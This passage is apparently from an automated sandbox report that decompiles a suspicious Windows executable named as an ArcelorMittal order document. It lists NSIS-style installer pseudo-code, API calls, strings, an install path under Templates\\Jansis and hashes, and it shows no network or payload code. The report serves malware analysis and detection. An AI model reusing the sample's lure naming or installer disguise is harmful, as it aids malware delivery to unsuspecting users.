							E00404118(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x79ff08, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x7a8acc - _t135;
							if( *0x7a8acc == _t135) {
								_push( *0x7a1f3c);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x79ff08);
							}
							E0040412B();
							E00406032(0x7a1f40, "Overcaustically Setup");
							E00406054(0x7a1f40, _t127, _t132,  &(0x7a1f40[lstrlenW(0x7a1f40)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f40); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a7a18); // executed
									 *0x7a0f18 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x7a8a40,  *_t132 +  *0x7a7a20 & 0x0000ffff, _t127,  *(0x40a38c +  *(_t132 + 4) * 4), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x7a7a18 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004040F6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x7a7a18, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x7a7a0c - _t135; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a7a18, 8); // executed
									E00404142(0x405);
									goto L58;
								}
								__eflags =  *0x7a8acc - _t135;
								if( *0x7a8acc != _t135) {
									goto L61;
								}
								__eflags =  *0x7a8ac0 - _t135;
								if( *0x7a8ac0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a7a18);
						 *0x7a8a48 = _t135;
						EndDialog(_t127,  *0x7a0710);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x7a7a18, 0x40f, 0, 1);
						__eflags =  *0x7a7a0c - _t135; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x7a1f20, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f20,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040415D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x7a7a18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a8acc - _t135;
										if( *0x7a8acc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x7a0710 = 1;
											L21:
											_push(0x78);
											L22:
											E004040CF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x7a0710 = _t129;
										goto L21;
									}
									__eflags =  *0x40a388 - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x7a7a18);
						 *0x7a7a18 = _a12;
						L58:
						if( *0x7a3f40 == _t135) {
							_t144 =  *0x7a7a18 - _t135; // 0x103ae
							if(_t144 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x7a3f40 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                0x00403c27
                                                0x00403c30
                                                0x00403d71
                                                0x00403d75
                                                0x00403d79
                                                0x00403d7b
                                                0x00403d80
                                                0x00403d8b
                                                0x00403d96
                                                0x00403d9b
                                                0x00403d9d
                                                0x00403d9f
                                                0x00403da2
                                                0x00403da7
                                                0x00403db5
                                                0x00403dc2
                                                0x00403dc9
                                                0x00403dc9
                                                0x00403dca
                                                0x00403dca
                                                0x00403dcf
                                                0x00403dd5
                                                0x00403ddc
                                                0x00403de2
                                                0x00403de4
                                                0x00403e24
                                                0x00403e29
                                                0x00403e2e
                                                0x00403e2e
                                                0x00403e33
                                                0x00403e3c
                                                0x00403e3e
                                                0x00403e43
                                                0x00403e49
                                                0x00403e4d
                                                0x00403e4d
                                                0x00403e52
                                                0x00403e58
                                                0x00000000
                                                0x00000000
                                                0x00403e63
                                                0x00403e69
                                                0x00000000
                                                0x00000000
                                                0x00403e72
                                                0x00403e7a
                                                0x00403e7f
                                                0x00403e82
                                                0x00403e88
                                                0x00403e8d
                                                0x00403e90
                                                0x00403e96
                                                0x00403e9b
                                                0x00403e9e
                                                0x00403ea4
                                                0x00403eac
                                                0x00403eb2
                                                0x00403eb8
                                                0x00403ebc
                                                0x00403ec3
                                                0x00403ec3
                                                0x00403ec3
                                                0x00403ecd
                                                0x00403edf
                                                0x00403eeb
                                                0x00403ef0
                                                0x00403efa
                                                0x00403f00
                                                0x00403f02
                                                0x00403f07
                                                0x00403f04
                                                0x00403f04
                                                0x00403f04
                                                0x00403f17
                                                0x00403f2f
                                                0x00403f31
                                                0x00403f37
                                                0x00403f4c
                                                0x00403f39
                                                0x00403f42
                                                0x00403f44
                                                0x00403f44
                                                0x00403f52
                                                0x00403f62
                                                0x00403f78
                                                0x00403f7f
                                                0x00403f85
                                                0x00403f89
                                                0x00403f8e
                                                0x00403f90
                                                0x00000000
                                                0x00403f96
                                                0x00403f96
                                                0x00403f98
                                                0x00000000
                                                0x00000000
                                                0x00403f9e
                                                0x00403fa2
                                                0x00403fc7
                                                0x00403fcd
                                                0x00403fd3
                                                0x00403fd5
                                                0x00000000
                                                0x00000000
                                                0x00403ffb
                                                0x00404001
                                                0x00404003
                                                0x00404008
                                                0x00000000
                                                0x00000000
                                                0x0040400e
                                                0x00404011
                                                0x00404014
                                                0x0040402b
                                                0x00404037
                                                0x00404050
                                                0x00404056
                                                0x0040405a
                                                0x0040405f
                                                0x00404065
                                                0x00000000
                                                0x00000000
                                                0x0040406f
                                                0x0040407a
                                                0x00000000
                                                0x0040407a
                                                0x00403fa4
                                                0x00403faa
                                                0x00000000
                                                0x00000000
                                                0x00403fb0
                                                0x00403fb6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403fbc
                                                0x00403f90
                                                0x00404087
                                                0x00404093
                                                0x0040409a
                                                0x00000000
                                                0x00403de6
                                                0x00403de6
                                                0x00403de9
                                                0x00403e1c
                                                0x00403e1c
                                                0x00403e1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403e1e
                                                0x00403deb
                                                0x00403def
                                                0x00403df4
                                                0x00403df6
                                                0x00000000
                                                0x00000000
                                                0x00403e06
                                                0x00403e0e
                                                0x00000000
                                                0x00403e14
                                                0x00403c42
                                                0x00403c42
                                                0x00403c46
                                                0x00403c4b
                                                0x00403c5a
                                                0x00403c5a
                                                0x00403c63
                                                0x00403c6c
                                                0x00403c77
                                                0x00403c77
                                                0x00403c83
                                                0x00403c9f
                                                0x00403ca2
                                                0x00403cb5
                                                0x00403cbb
                                                0x00403d5e
                                                0x00000000
                                                0x00403d67
                                                0x00403cc1
                                                0x00403cce
                                                0x00403cd0
                                                0x00403cd2
                                                0x00403cf1
                                                0x00403cf1
                                                0x00403cf4
                                                0x00403cf9
                                                0x00403cfc
                                                0x00403d0c
                                                0x00403d0d
                                                0x00403d0f
                                                0x00403d45
                                                0x00403d58
                                                0x00000000
                                                0x00403d58
                                                0x00403d11
                                                0x00403d17
                                                0x00403d30
                                                0x00403d35
                                                0x00403d37
                                                0x00000000
                                                0x00000000
                                                0x00403d39
                                                0x00403d25
                                                0x00403d25
                                                0x00403d27
                                                0x00403d27
                                                0x00000000
                                                0x00403d27
                                                0x00403d1a
                                                0x00403d1f
                                                0x00000000
                                                0x00403d1f
                                                0x00403cfe
                                                0x00403d04
                                                0x00000000
                                                0x00000000
                                                0x00403d06
                                                0x00000000
                                                0x00403d06
                                                0x00403cf6
                                                0x00000000
                                                0x00403cf6
                                                0x00403cdc
                                                0x00403ce3
                                                0x00403ce9
                                                0x00403ceb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ceb
                                                0x00403ca7
                                                0x00000000
                                                0x00403c85
                                                0x00403c8b
                                                0x00403c95
                                                0x004040a0
                                                0x004040a6
                                                0x004040a8
                                                0x004040ae
                                                0x004040b3
                                                0x004040b9
                                                0x004040b9
                                                0x004040ae
                                                0x004040c3
                                                0x00000000
                                                0x004040c3
                                                0x00403c83

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C5A
                                                • ShowWindow.USER32(?), ref: 00403C77
                                                • DestroyWindow.USER32 ref: 00403C8B
                                                • SetWindowLongW.USER32 ref: 00403CA7
                                                • GetDlgItem.USER32 ref: 00403CC8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CDC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403CE3
                                                • GetDlgItem.USER32 ref: 00403D91
                                                • GetDlgItem.USER32 ref: 00403D9B
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403DB5
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E06
                                                • GetDlgItem.USER32 ref: 00403EAC
                                                • ShowWindow.USER32(00000000,?), ref: 00403ECD
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDF
                                                • EnableWindow.USER32(?,?), ref: 00403EFA
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F10
                                                • EnableMenuItem.USER32 ref: 00403F17
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F42
                                                • lstrlenW.KERNEL32(007A1F40,?,007A1F40,Overcaustically Setup), ref: 00403F6B
                                                • SetWindowTextW.USER32(?,007A1F40), ref: 00403F7F
                                                • ShowWindow.USER32(?,0000000A), ref: 004040B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                • String ID: Overcaustically Setup
                                                • API String ID: 3906175533-1715260814
                                                • Opcode ID: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                • Instruction ID: cca83e8e3ea8fbb2d4c878b4d098dd65b90ea533b8cc41e08898a63a3c4fefdb
                                                • Opcode Fuzzy Hash: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
                                                • Instruction Fuzzy Hash: FFC1BE71504204AFDB20AF61ED84E2B7BA8EB86745F00893EF641B11F0CB3D9952DB5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040387B Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 404 40387b-403893 call 406408 407 403895-4038a5 call 405f79 404->407 408 4038a7-4038de call 405eff 404->408 417 403901-40392a call 403b51 call 405aee 407->417 413 4038e0-4038f1 call 405eff 408->413 414 4038f6-4038fc lstrcatW 408->414 413->414 414->417 422 403930-403935 417->422 423 4039bc-4039c4 call 405aee 417->423 422->423 424 40393b-403963 call 405eff 422->424 429 4039d2-4039f7 LoadImageW 423->429 430 4039c6-4039cd call 406054 423->430 424->423 431 403965-403969 424->431 433 403a78-403a80 call 40140b 429->433 434 4039f9-403a29 RegisterClassW 429->434 430->429 435 40397b-403987 lstrlenW 431->435 436 40396b-403978 call 405a13 431->436 445 403a82-403a85 433->445 446 403a8a-403a95 call 403b51 433->446 437 403b47 434->437 438 403a2f-403a73 SystemParametersInfoW CreateWindowExW 434->438 443 403989-403997 lstrcmpiW 435->443 444 4039af-4039b7 call 4059e6 call 406032 435->444 436->435 442 403b49-403b50 437->442 438->433 443->444 449 403999-4039a3 GetFileAttributesW 443->449 444->423 445->442 457 403a9b-403ab5 ShowWindow call 40639c 446->457 458 403b1e-403b1f call 405264 446->458 452 4039a5-4039a7 449->452 453 4039a9-4039aa call 405a32 449->453 452->444 452->453 453->444 465 403ac1-403ad3 GetClassInfoW 457->465 466 403ab7-403abc call 40639c 457->466 461 403b24-403b26 458->461 463 403b40-403b42 call 40140b 461->463 464 403b28-403b2e 461->464 463->437 464->445 467 403b34-403b3b call 40140b 464->467 470 403ad5-403ae5 GetClassInfoW RegisterClassW 465->470 471 403aeb-403b0e DialogBoxParamW call 40140b 465->471 466->465 467->445 470->471 475 403b13-403b1c call 4037cb 471->475 475->442
                                                C-Code - Quality: 96%
                                                			E0040387B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a50;
				_t22 = E00406408(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f40;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f40, 0);
					__eflags =  *0x7a1f40;
					if(__eflags == 0) {
						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040838C, 0x7a1f40, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00405F79(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403B51(_t78, _t90);
				_t86 = L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis";
				 *0x7a8ac0 =  *0x7a8a58 & 0x00000020;
				 *0x7a8adc = 0x10000;
				if(E00405AEE(_t90, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") != 0) {
					L16:
					if(E00405AEE(_t98, _t86) == 0) {
						E00406054(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x7a8a40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a28 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403B51(_t78, __eflags);
							__eflags =  *0x7a8ae0;
							if( *0x7a8ae0 != 0) {
								_t33 = E00405264(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f20, 5); // executed
							_t39 = E0040639C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040639C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a79e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a79e0);
								 *0x7a7a04 = _t87;
								RegisterClassW(0x7a79e0);
							}
							_t41 =  *0x7a7a20; // 0x0
							_t44 = DialogBoxParamW( *0x7a8a40, _t41 + 0x00000069 & 0x0000ffff, 0, E00403C1E, 0); // executed
							E004037CB(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a40;
						 *0x7a79e4 = E00401000;
						 *0x7a79f0 =  *0x7a8a40;
						 *0x7a79f4 = _t30;
						 *0x7a7a04 = 0x40a3a0;
						if(RegisterClassW(0x7a79e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f20 = CreateWindowExW(0x80, 0x40a3a0, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a40, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x7a69e0;
					E00405EFF( *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69e0, 0);
					_t63 =  *0x7a69e0; // 0x45
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a69e2;
						 *((short*)(E00405A13(0x7a69e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406032(_t86, E004059E6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405A32(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                0x00403881
                                                0x0040388a
                                                0x00403891
                                                0x00403893
                                                0x004038a7
                                                0x004038b9
                                                0x004038c2
                                                0x004038cb
                                                0x004038d2
                                                0x004038d7
                                                0x004038de
                                                0x004038f1
                                                0x004038f1
                                                0x004038fc
                                                0x00403895
                                                0x004038a0
                                                0x004038a0
                                                0x00403901
                                                0x0040390b
                                                0x00403914
                                                0x00403919
                                                0x0040392a
                                                0x004039bc
                                                0x004039c4
                                                0x004039cd
                                                0x004039cd
                                                0x004039e3
                                                0x004039e9
                                                0x004039f7
                                                0x00403a78
                                                0x00403a80
                                                0x00403a8a
                                                0x00403a8f
                                                0x00403a95
                                                0x00403b1f
                                                0x00403b24
                                                0x00403b26
                                                0x00403b42
                                                0x00000000
                                                0x00403b42
                                                0x00403b28
                                                0x00403b2e
                                                0x00403b36
                                                0x00403b36
                                                0x00000000
                                                0x00403b2e
                                                0x00403aa3
                                                0x00403aae
                                                0x00403ab3
                                                0x00403ab5
                                                0x00403abc
                                                0x00403abc
                                                0x00403ac7
                                                0x00403acf
                                                0x00403ad1
                                                0x00403ad3
                                                0x00403adc
                                                0x00403adf
                                                0x00403ae5
                                                0x00403ae5
                                                0x00403aeb
                                                0x00403b04
                                                0x00403b15
                                                0x00000000
                                                0x00403b1a
                                                0x00403a82
                                                0x00403a84
                                                0x00000000
                                                0x004039f9
                                                0x004039f9
                                                0x00403a05
                                                0x00403a0f
                                                0x00403a15
                                                0x00403a1a
                                                0x00403a29
                                                0x00403b47
                                                0x00403b47
                                                0x00000000
                                                0x00403b47
                                                0x00403a38
                                                0x00403a73
                                                0x00000000
                                                0x00403a73
                                                0x00403930
                                                0x00403930
                                                0x00403935
                                                0x00000000
                                                0x00000000
                                                0x00403943
                                                0x00403955
                                                0x0040395a
                                                0x00403963
                                                0x00000000
                                                0x00000000
                                                0x00403969
                                                0x0040396b
                                                0x00403978
                                                0x00403978
                                                0x00403981
                                                0x00403987
                                                0x004039af
                                                0x004039b7
                                                0x00000000
                                                0x00403999
                                                0x0040399a
                                                0x004039a3
                                                0x004039a9
                                                0x004039aa
                                                0x00000000
                                                0x004039aa
                                                0x004039a5
                                                0x004039a7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004039a7
                                                0x00403987

                                                APIs
                                                  • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                  • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                • lstrcatW.KERNEL32(1033,007A1F40), ref: 004038FC
                                                • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000,00000002,772EFAA0), ref: 0040397C
                                                • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000), ref: 0040398F
                                                • GetFileAttributesW.KERNEL32(ExecToStack), ref: 0040399A
                                                • LoadImageW.USER32 ref: 004039E3
                                                  • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                • RegisterClassW.USER32 ref: 00403A20
                                                • SystemParametersInfoW.USER32 ref: 00403A38
                                                • CreateWindowExW.USER32 ref: 00403A6D
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AA3
                                                • GetClassInfoW.USER32 ref: 00403ACF
                                                • GetClassInfoW.USER32 ref: 00403ADC
                                                • RegisterClassW.USER32 ref: 00403AE5
                                                • DialogBoxParamW.USER32 ref: 00403B04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$yz
                                                • API String ID: 1975747703-2536485963
                                                • Opcode ID: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                • Instruction ID: b5c0bd5baa1962433b8b11afb21299241a1e412529c89f65b595a7484f15debb
                                                • Opcode Fuzzy Hash: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
                                                • Instruction Fuzzy Hash: E761A570240600AED620BF669D46F2B3A6CEBC5B45F40857FF941B22E2DB7C9901CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 478 402dee-402e3c GetTickCount GetModuleFileNameW call 405c07 481 402e48-402e76 call 406032 call 405a32 call 406032 GetFileSize 478->481 482 402e3e-402e43 478->482 490 402f63-402f71 call 402d8a 481->490 491 402e7c 481->491 483 403020-403024 482->483 498 402f73-402f76 490->498 499 402fc6-402fcb 490->499 493 402e81-402e98 491->493 495 402e9a 493->495 496 402e9c-402ea5 call 40321f 493->496 495->496 503 402eab-402eb2 496->503 504 402fcd-402fd5 call 402d8a 496->504 501 402f78-402f90 call 403235 call 40321f 498->501 502 402f9a-402fc4 GlobalAlloc call 403235 call 403027 498->502 499->483 501->499 525 402f92-402f98 501->525 502->499 529 402fd7-402fe8 502->529 507 402eb4-402ec8 call 405bc2 503->507 508 402f2e-402f32 503->508 504->499 513 402f3c-402f42 507->513 527 402eca-402ed1 507->527 512 402f34-402f3b call 402d8a 508->512 508->513 512->513 520 402f51-402f5b 513->520 521 402f44-402f4e call 4064b9 513->521 520->493 528 402f61 520->528 521->520 525->499 525->502 527->513 531 402ed3-402eda 527->531 528->490 532 402ff0-402ff5 529->532 533 402fea 529->533 531->513 534 402edc-402ee3 531->534 535 402ff6-402ffc 532->535 533->532 534->513 537 402ee5-402eec 534->537 535->535 536 402ffe-403019 SetFilePointer call 405bc2 535->536 540 40301e 536->540 537->513 539 402eee-402f0e 537->539 539->499 541 402f14-402f18 539->541 540->483 542 402f20-402f28 541->542 543 402f1a-402f1e 541->543 542->513 544 402f2a-402f2c 542->544 543->528 543->542 544->513
                                                C-Code - Quality: 80%
                                                			E00402DEE(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
